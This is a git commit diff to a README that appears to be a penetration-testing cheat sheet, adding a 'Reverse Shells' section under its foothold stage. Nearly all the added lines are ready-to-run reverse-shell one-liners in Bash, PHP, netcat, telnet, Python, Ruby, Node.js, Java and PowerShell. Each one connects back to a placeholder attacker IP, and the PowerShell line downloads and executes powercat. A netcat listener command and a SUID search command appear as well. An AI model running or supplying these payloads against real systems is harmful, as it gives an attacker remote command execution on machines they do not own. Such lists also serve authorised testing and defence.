Added More More More
This commit is contained in:
parent
1893385526
commit
c90fffe181
54
README.md
54
README.md
@ -86,7 +86,7 @@ masscan IP -p 1-65535 --rate 100 -oX masscan.xml
## Stage 2 - Foothold
## Stage 2 - Foothold
### Attacking
### Attacking - Reverse Shells
* PHP Reverse Shell
* PHP Reverse Shell
@ -282,6 +282,56 @@ function printit ($string) {
?>
?>
```
```
* Listen Port
```
ncat -vlnp 4444
```
* Bash
```
bash -i >& /dev/tcp/IP/4444 0>&1
bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1'
```
* PHP
```
php -r '$sock=fsockopen("^IP^",5566);exec("/bin/sh -i <&3 >&3 2>&3");'`
```
* NC
```
nc -e /bin/sh ^IP^ 5566`
```
* Telnet
```
mknod backpipe p && telnet ^IP^ 5566 0<backpipe | /bin/bash 1>backpipe`
```
* Python
```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`
```
* Ruby
```
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","5566");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'`
```
* Node.js
```
var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(5566, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);});
```
```
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/5566 0>&1'");`
```
* Java
```Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();`
```
```
java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html
```
* Powershell
```
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd
```
### Spawning a Shell
### Spawning a Shell
@ -339,7 +389,7 @@ export TERM=xterm
* Linux Tools
* Linux Tools
| | Command|
| | Command|
|---|--------|
|---|--------|
| | find / -type f -user root -perm -4000 2>/dev/null|
| SUID | find / -type f -user root -perm -4000 2>/dev/null|